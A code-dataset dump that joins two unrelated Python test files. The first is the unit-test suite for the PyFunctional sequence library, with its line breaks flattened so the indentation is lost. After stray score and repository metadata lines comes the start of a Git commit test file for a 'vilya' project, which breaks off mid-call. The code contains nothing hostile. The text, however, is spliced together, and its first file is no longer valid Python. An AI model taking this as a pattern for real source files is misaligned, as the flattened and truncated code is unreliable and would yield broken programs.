<filename>lib/python3.5/functional/test/test_functional.py # pylint: skip-file import unittest import array from collections import namedtuple from itertools import product from functional.pipeline import Sequence, is_iterable, _wrap, extend from functional.transformations import name from functional import seq, pseq Data = namedtuple("Data", "x y") def pandas_is_installed(): try: global pandas import pandas return True except ImportError: return False class TestPipeline(unittest.TestCase): def setUp(self): self.seq = seq def assert_type(self, s): self.assertTrue(isinstance(s, Sequence)) def assert_not_type(self, s): self.assertFalse(isinstance(s, Sequence)) def assertIteratorEqual(self, iter_0, iter_1): seq_0 = list(iter_0) seq_1 = list(iter_1) self.assertListEqual(seq_0, seq_1) def test_is_iterable(self): self.assertFalse(is_iterable([])) self.assertTrue(is_iterable(iter([1, 2]))) def test_constructor(self): self.assertRaises(TypeError, lambda: Sequence(1)) def test_base_sequence(self): l = [] self.assert_type(self.seq(l)) self.assert_not_type(self.seq(l).sequence) self.assert_type(self.seq(self.seq(l))) self.assert_not_type(self.seq(self.seq(l)).sequence) self.assert_not_type(self.seq(l)._base_sequence) def test_eq(self): l = [1, 2, 3] self.assertIteratorEqual(self.seq(l).map(lambda x: x), self.seq(l)) def test_ne(self): a = [1, 2, 3] b = [1] self.assertNotEqual(self.seq(a), self.seq(b)) def test_repr(self): l = [1, 2, 3] self.assertEqual(repr(l), repr(self.seq(l))) def test_lineage_name(self): f = lambda x: x self.assertEqual(f.__name__, name(f)) f = "test" self.assertEqual("test", name(f)) def test_str(self): l = [1, 2, 3] self.assertEqual(str(l), str(self.seq(l))) def test_hash(self): self.assertRaises(TypeError, lambda: hash(self.seq([1]))) def test_len(self): l = [1, 2, 3] s = self.seq(l) self.assertEqual(len(l), s.size()) self.assertEqual(len(l), s.len()) def test_count(self): l = self.seq([-1, -1, 1, 1, 1]) self.assertEqual(l.count(lambda x: x > 0), 3) self.assertEqual(l.count(lambda x: x < 0), 2) def test_getitem(self): l = [1, 2, [3, 4, 5]] s = self.seq(l).map(lambda x: x) self.assertEqual(s[1], 2) self.assertEqual(s[2], [3, 4, 5]) self.assert_type(s[2]) self.assertEqual(s[1:], [2, [3, 4, 5]]) self.assert_type(s[1:]) l = [{1, 2}, {2, 3}, {4, 5}] s = self.seq(l) self.assertIsInstance(s[0], set) self.assertEqual(s[0], l[0]) def test_iter(self): l = list(enumerate(self.seq([1, 2, 3]))) e = list(enumerate([1, 2, 3])) self.assertEqual(l, e) l = self.seq([1, 2, 3]) e = [1, 2, 3] result = [] for n in l: result.append(n) self.assertEqual(result, e) self.assert_type(l) def test_contains(self): string = "abcdef" s = self.seq(iter(string)).map(lambda x: x) self.assertTrue("c" in s) def test_add(self): l0 = self.seq([1, 2, 3]).map(lambda x: x) l1 = self.seq([4, 5, 6]) l2 = [4, 5, 6] expect = [1, 2, 3, 4, 5, 6] self.assertEqual(l0 + l1, expect) self.assertEqual(l0 + l2, expect) def test_head(self): l = self.seq([1, 2, 3]).map(lambda x: x) self.assertEqual(l.head(), 1) l = self.seq([[1, 2], 3, 4]) self.assertEqual(l.head(), [1, 2]) self.assert_type(l.head()) l = self.seq([]) with self.assertRaises(IndexError): l.head() def test_first(self): l = self.seq([1, 2, 3]).map(lambda x: x) self.assertEqual(l.first(), 1) l = self.seq([[1, 2], 3, 4]).map(lambda x: x) self.assertEqual(l.first(), [1, 2]) self.assert_type(l.first()) l = self.seq([]) with self.assertRaises(IndexError): l.head() def test_head_option(self): l = self.seq([1, 2, 3]).map(lambda x: x) self.assertEqual(l.head_option(), 1) l = self.seq([[1, 2], 3, 4]).map(lambda x: x) self.assertEqual(l.head_option(), [1, 2]) self.assert_type(l.head_option()) l = self.seq([]) self.assertIsNone(l.head_option()) def test_last(self): l = self.seq([1, 2, 3]).map(lambda x: x) self.assertEqual(l.last(), 3) l = self.seq([1, 2, [3, 4]]).map(lambda x: x) self.assertEqual(l.last(), [3, 4]) self.assert_type(l.last()) def test_last_option(self): l = self.seq([1, 2, 3]).map(lambda x: x) self.assertEqual(l.last_option(), 3) l = self.seq([1, 2, [3, 4]]).map(lambda x: x) self.assertEqual(l.last_option(), [3, 4]) self.assert_type(l.last_option()) l = self.seq([]) self.assertIsNone(l.last_option()) def test_init(self): result = self.seq([1, 2, 3, 4]).map(lambda x: x).init() expect = [1, 2, 3] self.assertIteratorEqual(result, expect) def test_tail(self): l = self.seq([1, 2, 3, 4]).map(lambda x: x) expect = [2, 3, 4] self.assertIteratorEqual(l.tail(), expect) def test_inits(self): l = self.seq([1, 2, 3]).map(lambda x: x) expect = [[1, 2, 3], [1, 2], [1], []] self.assertIteratorEqual(l.inits(), expect) self.assertIteratorEqual(l.inits().map(lambda s: s.sum()), [6, 3, 1, 0]) def test_tails(self): l = self.seq([1, 2, 3]).map(lambda x: x) expect = [[1, 2, 3], [2, 3], [3], []] self.assertIteratorEqual(l.tails(), expect) self.assertIteratorEqual(l.tails().map(lambda s: s.sum()), [6, 5, 3, 0]) def test_drop(self): s = self.seq([1, 2, 3, 4, 5, 6]) expect = [5, 6] result = s.drop(4) self.assertIteratorEqual(result, expect) self.assert_type(result) self.assertIteratorEqual(s.drop(0), s) self.assertIteratorEqual(s.drop(-1), s) def test_drop_right(self): s = self.seq([1, 2, 3, 4, 5]).map(lambda x: x) expect = [1, 2, 3] result = s.drop_right(2) self.assert_type(result) self.assertIteratorEqual(result, expect) self.assertIteratorEqual(s.drop_right(0), s) self.assertIteratorEqual(s.drop_right(-1), s) def test_drop_while(self): l = [1, 2, 3, 4, 5, 6, 7, 8] f = lambda x: x < 4 expect = [4, 5, 6, 7, 8] result = self.seq(l).drop_while(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_take(self): s = self.seq([1, 2, 3, 4, 5, 6]) expect = [1, 2, 3, 4] result = s.take(4) self.assertIteratorEqual(result, expect) self.assert_type(result) self.assertIteratorEqual(s.take(0), self.seq([])) self.assertIteratorEqual(s.take(-1), self.seq([])) def test_take_while(self): l = [1, 2, 3, 4, 5, 6, 7, 8] f = lambda x: x < 4 expect = [1, 2, 3] result = self.seq(l).take_while(f) self.assertIteratorEqual(result, expect) self.assert_type(result) def test_union(self): result = self.seq([1, 1, 2, 3, 3]).union([1, 4, 5]) expect = [1, 2, 3, 4, 5] self.assert_type(result) self.assertSetEqual(result.set(), set(expect)) def test_intersection(self): result = self.seq([1, 2, 2, 3]).intersection([2, 3, 4, 5]) expect = [2, 3] self.assert_type(result) self.assertSetEqual(result.set(), set(expect)) def test_difference(self): result = self.seq([1, 2, 3]).difference([2, 3, 4]) expect = [1] self.assert_type(result) self.assertSetEqual(result.set(), set(expect)) def test_symmetric_difference(self): result = self.seq([1, 2, 3, 3]).symmetric_difference([2, 4, 5]) expect = [1, 3, 4, 5] self.assert_type(result) self.assertSetEqual(result.set(), set(expect)) def test_map(self): f = lambda x: x * 2 l = [1, 2, 0, 5] expect = [2, 4, 0, 10] result = self.seq(l).map(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_select(self): f = lambda x: x * 2 l = [1, 2, 0, 5] expect = [2, 4, 0, 10] result = self.seq(l).select(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_starmap(self): f = lambda x, y: x * y l = [(1, 1), (0, 3), (-3, 3), (4, 2)] expect = [1, 0, -9, 8] result = self.seq(l).starmap(f) self.assertIteratorEqual(expect, result) self.assert_type(result) result = self.seq(l).smap(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_filter(self): f = lambda x: x > 0 l = [0, -1, 5, 10] expect = [5, 10] s = self.seq(l) result = s.filter(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_where(self): f = lambda x: x > 0 l = [0, -1, 5, 10] expect = [5, 10] s = self.seq(l) result = s.where(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_filter_not(self): f = lambda x: x > 0 l = [0, -1, 5, 10] expect = [0, -1] result = self.seq(l).filter_not(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_map_filter(self): f = lambda x: x > 0 g = lambda x: x * 2 l = [0, -1, 5] s = self.seq(l) expect = [10] result = s.filter(f).map(g) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_reduce(self): f = lambda x, y: x + y l = ["a", "b", "c"] expect = "abc" s = self.seq(l) self.assertEqual(expect, s.reduce(f)) with self.assertRaises(TypeError): seq([]).reduce(f) with self.assertRaises(ValueError): seq([]).reduce(f, 0, 0) self.assertEqual(seq([]).reduce(f, 1), 1) self.assertEqual(seq([0, 2]).reduce(f, 1), 3) def test_accumulate(self): f = lambda x, y: x + y l_char = ["a", "b", "c"] expect_char = ["a", "ab", "abc"] l_num = [1, 2, 3] expect_num = [1, 3, 6] self.assertEqual(seq(l_char).accumulate(), expect_char) self.assertEqual(seq(l_num).accumulate(), expect_num) def test_aggregate(self): f = lambda current, next_element: current + next_element l = self.seq([1, 2, 3, 4]) self.assertEqual(l.aggregate(f), 10) self.assertEqual(l.aggregate(0, f), 10) self.assertEqual(l.aggregate(0, f, lambda x: 2 * x), 20) l = self.seq(["a", "b", "c"]) self.assertEqual(l.aggregate(f), "abc") self.assertEqual(l.aggregate("", f), "abc") self.assertEqual(l.aggregate("", f, lambda x: x.upper()), "ABC") self.assertEqual(l.aggregate(f), "abc") self.assertEqual(l.aggregate("z", f), "zabc") self.assertEqual(l.aggregate("z", f, lambda x: x.upper()), "ZABC") with self.assertRaises(ValueError): l.aggregate() with self.assertRaises(ValueError): l.aggregate(None, None, None, None) def test_fold_left(self): f = lambda current, next_element: current + next_element l = self.seq([1, 2, 3, 4]) self.assertEqual(l.fold_left(0, f), 10) self.assertEqual(l.fold_left(-10, f), 0) l = self.seq(["a", "b", "c"]) self.assertEqual(l.fold_left("", f), "abc") self.assertEqual(l.fold_left("z", f), "zabc") f = lambda x, y: x + [y] self.assertEqual(l.fold_left([], f), ["a", "b", "c"]) self.assertEqual(l.fold_left(["start"], f), ["start", "a", "b", "c"]) def test_fold_right(self): f = lambda next_element, current: current + next_element l = self.seq([1, 2, 3, 4]) self.assertEqual(l.fold_right(0, f), 10) self.assertEqual(l.fold_right(-10, f), 0) l = self.seq(["a", "b", "c"]) self.assertEqual(l.fold_right("", f), "cba") self.assertEqual(l.fold_right("z", f), "zcba") f = lambda next_element, current: current + [next_element] self.assertEqual(l.fold_right([], f), ["c", "b", "a"]) self.assertEqual(l.fold_right(["start"], f), ["start", "c", "b", "a"]) def test_sorted(self): s = self.seq([1, 3, 2, 5, 4]) r = s.sorted() self.assertIteratorEqual([1, 2, 3, 4, 5], r) self.assert_type(r) def test_order_by(self): s = self.seq([(2, "a"), (1, "b"), (4, "c"), (3, "d")]) r = s.order_by(lambda x: x[0]) self.assertIteratorEqual([(1, "b"), (2, "a"), (3, "d"), (4, "c")], r) self.assert_type(r) def test_reverse(self): l = [1, 2, 3] expect = [4, 3, 2] s = self.seq(l).map(lambda x: x + 1) result = s.reverse() self.assertIteratorEqual(expect, result) self.assert_type(result) result = s.__reversed__() self.assertIteratorEqual(expect, result) self.assert_type(result) def test_distinct(self): l = [1, 1, 2, 3, 2, 3] expect = [1, 2, 3] s = self.seq(l) result = s.distinct() for e in result: self.assertTrue(e in expect) result = s.distinct() self.assertEqual(result.size(), len(expect)) self.assert_type(result) def test_distinct_by(self): s = self.seq(Data(1, 2), Data(1, 3), Data(2, 0), Data(3, -1), Data(1, 5)) expect = {Data(1, 2), Data(2, 0), Data(3, -1)} result = s.distinct_by(lambda data: data.x) self.assertSetEqual(set(result), expect) self.assert_type(result) def test_slice(self): s = self.seq([1, 2, 3, 4]) result = s.slice(1, 2) self.assertIteratorEqual(result, [2]) self.assert_type(result) result = s.slice(1, 3) self.assertIteratorEqual(result, [2, 3]) self.assert_type(result) def test_any(self): l = [True, False] self.assertTrue(self.seq(l).any()) def test_all(self): l = [True, False] self.assertFalse(self.seq(l).all()) l = [True, True] self.assertTrue(self.seq(l).all()) def test_enumerate(self): l = [2, 3, 4] e = [(0, 2), (1, 3), (2, 4)] result = self.seq(l).enumerate() self.assertIteratorEqual(result, e) self.assert_type(result) def test_inner_join(self): l0 = [("a", 1), ("b", 2), ("c", 3)] l1 = [("a", 2), ("c", 4), ("d", 5)] result0 = self.seq(l0).inner_join(l1) result1 = self.seq(l0).join(l1, "inner") e = [("a", (1, 2)), ("c", (3, 4))] self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(e)) self.assertDictEqual(dict(result1), dict(e)) result0 = self.seq(l0).inner_join(self.seq(l1)) result1 = self.seq(l0).join(self.seq(l1), "inner") self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(e)) self.assertDictEqual(dict(result1), dict(e)) def test_left_join(self): left = [("a", 1), ("b", 2)] right = [("a", 2), ("c", 3)] result0 = self.seq(left).left_join(right) result1 = self.seq(left).join(right, "left") expect = [("a", (1, 2)), ("b", (2, None))] self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(expect)) self.assertDictEqual(dict(result1), dict(expect)) result0 = self.seq(left).left_join(self.seq(right)) result1 = self.seq(left).join(self.seq(right), "left") self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(expect)) self.assertDictEqual(dict(result1), dict(expect)) def test_right_join(self): left = [("a", 1), ("b", 2)] right = [("a", 2), ("c", 3)] result0 = self.seq(left).right_join(right) result1 = self.seq(left).join(right, "right") expect = [("a", (1, 2)), ("c", (None, 3))] self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(expect)) self.assertDictEqual(dict(result1), dict(expect)) result0 = self.seq(left).right_join(self.seq(right)) result1 = self.seq(left).join(self.seq(right), "right") self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(expect)) self.assertDictEqual(dict(result1), dict(expect)) def test_outer_join(self): left = [("a", 1), ("b", 2)] right = [("a", 2), ("c", 3)] result0 = self.seq(left).outer_join(right) result1 = self.seq(left).join(right, "outer") expect = [("a", (1, 2)), ("b", (2, None)), ("c", (None, 3))] self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(expect)) self.assertDictEqual(dict(result1), dict(expect)) result0 = self.seq(left).outer_join(self.seq(right)) result1 = self.seq(left).join(self.seq(right), "outer") self.assert_type(result0) self.assert_type(result1) self.assertDictEqual(dict(result0), dict(expect)) self.assertDictEqual(dict(result1), dict(expect)) def test_join(self): with self.assertRaises(TypeError): self.seq([(1, 2)]).join([(2, 3)], "").to_list() def test_max(self): l = [1, 2, 3] self.assertEqual(3, self.seq(l).max()) def test_min(self): l = [1, 2, 3] self.assertEqual(1, self.seq(l).min()) def test_max_by(self): l = ["aa", "bbbb", "c", "dd"] self.assertEqual("bbbb", self.seq(l).max_by(len)) def test_min_by(self): l = ["aa", "bbbb", "c", "dd"] self.assertEqual("c", self.seq(l).min_by(len)) def test_find(self): l = [1, 2, 3] f = lambda x: x == 3 g = lambda x: False self.assertEqual(3, self.seq(l).find(f)) self.assertIsNone(self.seq(l).find(g)) def test_flatten(self): l = [[1, 1, 1], [2, 2, 2], [[3, 3], [4, 4]]] expect = [1, 1, 1, 2, 2, 2, [3, 3], [4, 4]] result = self.seq(l).flatten() self.assertIteratorEqual(expect, result) self.assert_type(result) def test_flat_map(self): l = [[1, 1, 1], [2, 2, 2], [3, 3, 3]] f = lambda x: x expect = [1, 1, 1, 2, 2, 2, 3, 3, 3] result = self.seq(l).flat_map(f) self.assertIteratorEqual(expect, result) self.assert_type(result) def test_group_by(self): l = [(1, 1), (1, 2), (1, 3), (2, 2)] f = lambda x: x[0] expect = {1: [(1, 1), (1, 2), (1, 3)], 2: [(2, 2)]} result = self.seq(l).group_by(f) result_comparison = {} for kv in result: result_comparison[kv[0]] = kv[1] self.assertIteratorEqual(expect, result_comparison) self.assert_type(result) def test_group_by_key(self): l = [("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5)] e = {"a": [1, 2, 3], "b": [-1, 1], "c": [10, 5]}.items() result = self.seq(l).group_by_key() self.assertEqual(result.len(), len(e)) for e0, e1 in zip(result, e): self.assertIteratorEqual(e0, e1) self.assert_type(result) def test_grouped(self): l = self.seq([1, 2, 3, 4, 5, 6, 7, 8]) expect = [[1, 2], [3, 4], [5, 6], [7, 8]] self.assertIteratorEqual(map(list, l.grouped(2)), expect) expect = [[1, 2, 3], [4, 5, 6], [7, 8]] self.assertIteratorEqual(map(list, l.grouped(3)), expect) def test_grouped_returns_list(self): l = self.seq([1, 2, 3, 4, 5, 6, 7, 8]) self.assertTrue(is_iterable(l.grouped(2))) self.assertTrue(is_iterable(l.grouped(3))) def test_sliding(self): l = self.seq([1, 2, 3, 4, 5, 6, 7]) expect = [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7]] self.assertIteratorEqual(l.sliding(2), expect) l = self.seq([1, 2, 3]) expect = [[1, 2], [3]] self.assertIteratorEqual(l.sliding(2, 2), expect) expect = [[1, 2]] self.assertIteratorEqual(l.sliding(2, 3), expect) def test_empty(self): self.assertTrue(self.seq([]).empty()) def test_non_empty(self): self.assertTrue(self.seq([1]).non_empty()) def test_non_zero_bool(self): self.assertTrue(bool(self.seq([1]))) self.assertFalse(bool(self.seq([]))) def test_make_string(self): l = [1, 2, 3] expect1 = "123" expect2 = "1:2:3" s = self.seq(l) self.assertEqual(expect1, s.make_string("")) self.assertEqual(expect2, s.make_string(":")) s = self.seq([]) self.assertEqual("", s.make_string("")) self.assertEqual("", s.make_string(":")) def test_partition(self): l = [-1, -2, -3, 1, 2, 3] e2 = [-1, -2, -3] e1 = [1, 2, 3] f = lambda x: x > 0 s = self.seq(l) p1, p2 = s.partition(f) self.assertIteratorEqual(e1, list(p1)) self.assertIteratorEqual(e2, list(p2)) self.assert_type(p1) self.assert_type(p2) result = self.seq([[1, 2, 3], [4, 5, 6]]).flatten().partition(lambda x: x > 2) expect = [[3, 4, 5, 6], [1, 2]] self.assertIteratorEqual(expect, list(result)) self.assert_type(result) def test_cartesian(self): result = seq.range(3).cartesian(range(3)).list() self.assertListEqual(result, list(product(range(3), range(3)))) result = seq.range(3).cartesian(range(3), range(2)).list() self.assertListEqual(result, list(product(range(3), range(3), range(2)))) result = seq.range(3).cartesian(range(3), range(2), repeat=2).list() self.assertListEqual( result, list(product(range(3), range(3), range(2), repeat=2)) ) def test_product(self): l = [2, 2, 3] self.assertEqual(12, self.seq(l).product()) self.assertEqual(96, self.seq(l).product(lambda x: x * 2)) s = self.seq([]) self.assertEqual(1, s.product()) self.assertEqual(2, s.product(lambda x: x * 2)) s = self.seq([5]) self.assertEqual(5, s.product()) self.assertEqual(10, s.product(lambda x: x * 2)) def test_sum(self): l = [1, 2, 3] self.assertEqual(6, self.seq(l).sum()) self.assertEqual(12, self.seq(l).sum(lambda x: x * 2)) def test_average(self): l = [1, 2] self.assertEqual(1.5, self.seq(l).average()) self.assertEqual(4.5, self.seq(l).average(lambda x: x * 3)) def test_set(self): l = [1, 1, 2, 2, 3] ls = set(l) self.assertIteratorEqual(ls, self.seq(l).set()) def test_zip(self): l1 = [1, 2, 3] l2 = [-1, -2, -3] e = [(1, -1), (2, -2), (3, -3)] result = self.seq(l1).zip(l2) self.assertIteratorEqual(e, result) self.assert_type(result) def test_zip_with_index(self): l = [2, 3, 4] e = [(2, 0), (3, 1), (4, 2)] result = self.seq(l).zip_with_index() self.assertIteratorEqual(result, e) self.assert_type(result) e = [(2, 5), (3, 6), (4, 7)] result = self.seq(l).zip_with_index(5) self.assertIteratorEqual(result, e) self.assert_type(result) def test_to_list(self): l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}] result = self.seq(l).to_list() self.assertIteratorEqual(result, l) self.assertTrue(isinstance(result, list)) result = self.seq(iter([0, 1, 2])).to_list() self.assertIsInstance(result, list) result = self.seq(l).list(n=2) self.assertEqual(result, [1, 2]) def test_list(self): l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}] result = self.seq(l).list() self.assertEqual(result, l) self.assertTrue(isinstance(result, list)) result = self.seq(iter([0, 1, 2])).to_list() self.assertIsInstance(result, list) result = self.seq(l).list(n=2) self.assertEqual(result, [1, 2]) def test_for_each(self): l = [1, 2, 3, "abc", {1: 2}, {1, 2, 3}] result = [] def f(e): result.append(e) self.seq(l).for_each(f) self.assertEqual(result, l) def test_exists(self): l = ["aaa", "BBB", "ccc"] self.assertTrue(self.seq(l).exists(str.islower)) self.assertTrue(self.seq(l).exists(str.isupper)) self.assertFalse(self.seq(l).exists(lambda s: "d" in s)) def test_for_all(self): l = ["aaa", "bbb", "ccc"] self.assertTrue(self.seq(l).for_all(str.islower)) self.assertFalse(self.seq(l).for_all(str.isupper)) def test_to_dict(self): l = [(1, 2), (2, 10), (7, 2)] d = {1: 2, 2: 10, 7: 2} result = self.seq(l).to_dict() self.assertDictEqual(result, d) self.assertTrue(isinstance(result, dict)) result = self.seq(l).to_dict(default=lambda: 100) self.assertTrue(1 in result) self.assertFalse(3 in result) self.assertEqual(result[4], 100) result = self.seq(l).dict(default=100) self.assertTrue(1 in result) self.assertFalse(3 in result) self.assertEqual(result[4], 100) def test_dict(self): l = [(1, 2), (2, 10), (7, 2)] d = {1: 2, 2: 10, 7: 2} result = self.seq(l).dict() self.assertDictEqual(result, d) self.assertTrue(isinstance(result, dict)) result = self.seq(l).dict(default=lambda: 100) self.assertTrue(1 in result) self.assertFalse(3 in result) self.assertEqual(result[4], 100) result = self.seq(l).dict(default=100) self.assertTrue(1 in result) self.assertFalse(3 in result) self.assertEqual(result[4], 100) def test_reduce_by_key(self): l = [("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5)] e = {"a": 6, "b": 0, "c": 15}.items() result = self.seq(l).reduce_by_key(lambda x, y: x + y) self.assertEqual(result.len(), len(e)) for e0, e1 in zip(result, e): self.assertEqual(e0, e1) self.assert_type(result) def test_count_by_key(self): l = [ ("a", 1), ("a", 2), ("a", 3), ("b", -1), ("b", 1), ("c", 10), ("c", 5), ("d", 1), ] e = {"a": 3, "b": 2, "c": 2, "d": 1}.items() result = self.seq(l).count_by_key() self.assertEqual(result.len(), len(e)) for e0, e1 in zip(result, e): self.assertEqual(e0, e1) self.assert_type(result) def test_count_by_value(self): l = ["a", "a", "a", "b", "b", "c", "d"] e = {"a": 3, "b": 2, "c": 1, "d": 1}.items() result = self.seq(l).count_by_value() self.assertEqual(result.len(), len(e)) for e0, e1 in zip(result, e): self.assertEqual(e0, e1) self.assert_type(result) def test_wrap(self): self.assert_type(_wrap([1, 2])) self.assert_type(_wrap((1, 2))) self.assert_not_type(_wrap(1)) self.assert_not_type(_wrap(1.0)) self.assert_not_type(_wrap("test")) self.assert_not_type(_wrap(True)) self.assert_not_type(_wrap(Data(1, 2))) def test_wrap_objects(self): class A(object): a = 1 l = [A(), A(), A()] self.assertIsInstance(_wrap(A()), A) self.assert_type(self.seq(l)) @unittest.skipUnless( pandas_is_installed(), "Skip pandas tests if pandas is not installed" ) def test_wrap_pandas(self): df1 = pandas.DataFrame({"name": ["name1", "name2"], "value": [1, 2]}) df2 = pandas.DataFrame({"name": ["name1", "name2"], "value": [3, 4]}) result = seq([df1, df2]).reduce(lambda x, y: x.append(y)) self.assertEqual(result.len(), 4) self.assertEqual(result[0].to_list(), ["name1", 1]) self.assertEqual(result[1].to_list(), ["name2", 2]) self.assertEqual(result[2].to_list(), ["name1", 3]) self.assertEqual(result[3].to_list(), ["name2", 4]) def test_iterator_consumption(self): sequence = self.seq([1, 2, 3]) first_transform = sequence.map(lambda x: x) second_transform = first_transform.map(lambda x: x) first_list = list(first_transform) second_list = list(second_transform) expect = [1, 2, 3] self.assertIteratorEqual(first_list, expect) self.assertIteratorEqual(second_list, expect) def test_single_call(self): if self.seq is pseq: raise self.skipTest("pseq doesn't support functions with side-effects") counter = [] def counter_func(x): counter.append(1) return x list(self.seq([1, 2, 3, 4]).map(counter_func)) self.assertEqual(len(counter), 4) def test_seq(self): self.assertIteratorEqual(self.seq([1, 2, 3]), [1, 2, 3]) self.assertIteratorEqual(self.seq(1, 2, 3), [1, 2, 3]) self.assertIteratorEqual(self.seq(1), [1]) self.assertIteratorEqual(self.seq(iter([1, 2, 3])), [1, 2, 3]) with self.assertRaises(TypeError): self.seq() def test_lineage_repr(self): s = self.seq(1).map(lambda x: x).filter(lambda x: True) self.assertEqual( repr(s._lineage), "Lineage: sequence -> map(<lambda>) -> filter(<lambda>)" ) def test_cache(self): if self.seq is pseq: raise self.skipTest("pseq doesn't support functions with side-effects") calls = [] func = lambda x: calls.append(x) result = self.seq(1, 2, 3).map(func).cache().map(lambda x: x).to_list() self.assertEqual(len(calls), 3) self.assertEqual(result, [None, None, None]) result = self.seq(1, 2, 3).map(lambda x: x).cache() self.assertEqual( repr(result._lineage), "Lineage: sequence -> map(<lambda>) -> cache" ) result = self.seq(1, 2, 3).map(lambda x: x).cache(delete_lineage=True) self.assertEqual(repr(result._lineage), "Lineage: sequence") def test_tabulate(self): sequence = seq([[1, 2, 3], [4, 5, 6]]) self.assertEqual(sequence.show(), None) self.assertNotEqual(sequence._repr_html_(), None) result = sequence.tabulate() self.assertEqual(result, "- - -\n1 2 3\n4 5 6\n- - -") sequence = seq(1, 2, 3) self.assertEqual(sequence.tabulate(), None) class NotTabulatable(object): pass sequence = seq(NotTabulatable(), NotTabulatable(), NotTabulatable()) self.assertEqual(sequence.tabulate(), None) long_data = seq([(i, i + 1) for i in range(30)]) self.assertTrue("Showing 10 of 30 rows" in long_data.tabulate(n=10)) self.assertTrue("Showing 10 of 30 rows" in long_data._repr_html_()) self.assertTrue( "Showing 10 of 30 rows" not in long_data.tabulate(n=10, tablefmt="plain") ) def test_tabulate_namedtuple(self): sequence_tabulated = seq([Data(1, 2), Data(6, 7)]).tabulate() self.assertEqual(sequence_tabulated, " x y\n--- ---\n 1 2\n 6 7") def test_repr_max_lines(self): sequence = seq.range(200) self.assertEqual(len(repr(sequence)), 395) sequence._max_repr_items = None self.assertEqual(len(repr(sequence)), 890) class TestExtend(unittest.TestCase): def test_custom_functions(self): @extend(aslist=True) def my_zip(it): return zip(it, it) result = seq.range(3).my_zip().list() expected = list(zip(range(3), range(3))) self.assertEqual(result, expected) result = seq.range(3).my_zip().my_zip().list() expected = list(zip(expected, expected)) self.assertEqual(result, expected) @extend def square(it): return [i ** 2 for i in it] result = seq.range(100).square().list() expected = [i ** 2 for i in range(100)] self.assertEqual(result, expected) name = "PARALLEL_SQUARE" @extend(parallel=True, name=name) def square_parallel(it): return [i ** 2 for i in it] result = seq.range(100).square_parallel() self.assertEqual(result.sum(), sum(expected)) self.assertEqual( repr(result._lineage), "Lineage: sequence -> extended[%s]" % name ) @extend def my_filter(it, n=10): return (i for i in it if i > n) # test keyword args result = seq.range(20).my_filter(n=10).list() expected = list(filter(lambda x: x > 10, range(20))) self.assertEqual(result, expected) # test args result = seq.range(20).my_filter(10).list() self.assertEqual(result, expected) # test final @extend(final=True) def toarray(it): return array.array("f", it) result = seq.range(10).toarray() expected = array.array("f", range(10)) self.assertEqual(result, expected) result = seq.range(10).map(lambda x: x ** 2).toarray() expected = array.array("f", [i ** 2 for i in range(10)]) self.assertEqual(result, expected) # a more complex example combining all above @extend() def sum_pair(it): return (i[0] + i[1] for i in it) result = ( seq.range(100).my_filter(85).my_zip().sum_pair().square_parallel().toarray() ) expected = array.array( "f", list( map( lambda x: (x[0] + x[1]) ** 2, map(lambda x: (x, x), filter(lambda x: x > 85, range(100))), ) ), ) self.assertEqual(result, expected) class TestParallelPipeline(TestPipeline): def setUp(self): self.seq = pseq
2.46875
2
tests/test_git_commit_one_file.py
mubashshirjamal/code
1,582
11009
<reponame>mubashshirjamal/code # -*- coding: utf-8 -*- import os from vilya.models.project import CodeDoubanProject from vilya.models import git from tests.base import TestCase from tests.utils import mkdtemp from vilya.libs import gyt from vilya.libs.permdir import get_repo_root class TestGit(TestCase): @property def u(self): return self.addUser() def _path(self, name): return os.path.join(get_repo_root(), '%s.git' % name) def _path_work_tree(self, name): return os.path.join(get_repo_root(), '%s.work_tree' % name) def _repo(self, name, bare=True): git_path = self._path(name) if bare: work_tree_path = None else: work_tree_path = self._path_work_tree(name) if not os.path.exists(work_tree_path): os.mkdir(work_tree_path) try: CodeDoubanProject.create_git_repo(git_path) except: pass repo = git.GitRepo(git_path, work_tree=work_tree_path) return repo def _commit(self, repo, filename, content='testcontent', message='testmessage'): # TODO allow commiting more than one file assert os.path.exists(repo.work_tree), \ "repo.work_tree must exist, check if repo has been created with bare=False" # noqa path = os.path.join(repo.work_tree, filename) dir_ = os.path.dirname(path) if not os.path.exists(dir_): os.makedirs(os.path.dirname(path)) f = open(path, 'w') f.write(content) f.close() rep2 = gyt.repo(repo.path, repo.work_tree, bare=False) rep2.call(['add', filename]) rep2.call(['commit', filename, '-m', message], _env=self.env_for_git) return gyt.repo(repo.path).sha() def test_simple_commit(self): repo = self._repo('test', bare=False) self._commit(repo, 'testfile1', 'content1', 'msg1') src = repo.get_src('testfile1') assert src == ('blob', u'content1') repo.commit_one_file('testfile1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1')) src = repo.get_src('testfile1') assert src == ('blob', u'content1 modified') def test_simple_commit_do_not_delete_other_files(self): repo = self._repo('test', bare=False) self._commit(repo, 'testfile1', 'content1', 'msg1') self._commit(repo, 'testfile2', 'content2', 'msg2') repo.commit_one_file('testfile1', 'content1 modified', 'change1', self.u, orig_hash=hash('content1')) src = repo.get_src('testfile1') assert src == ('blob', u'content1 modified') type_, files = repo.get_src('') assert any(d['path'] == 'testfile2' for d in files), \ "testfile2 should exists in root tree" src = repo.get_src('testfile2') assert src == ('blob', u'content2') def test_commit_in_inner_directory(self): repo = self._repo('test', bare=False) self._commit(repo, 'test/file1', 'content1', 